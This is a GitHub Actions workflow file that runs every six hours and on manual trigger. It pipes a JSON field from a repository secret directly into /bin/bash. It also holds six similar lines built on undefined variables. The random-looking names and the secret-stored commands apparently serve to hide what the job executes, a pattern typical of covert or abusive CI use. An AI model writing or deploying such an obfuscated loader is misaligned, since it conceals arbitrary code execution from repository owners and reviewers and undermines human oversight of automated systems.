name: republicanscholar

on:
  workflow_dispatch:
  schedule:
    - cron: '7 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: republicanscholar
        env:
          flhap447: ${{ secrets.flhap447 }}
        run: |
          echo $flhap447 | jq -r .vjexn6291 | /bin/bash
          echo $b379 | jq -r .z22638 | /bin/bash
          echo $bw0 | jq -r .mrse7 | /bin/bash
          echo $yi175 | jq -r .kei4 | /bin/bash
          echo $nuk75 | jq -r .x5548 | /bin/bash
          echo $g4 | jq -r .ecq5 | /bin/bash
          echo $dv17675 | jq -r .q485 | /bin/bash

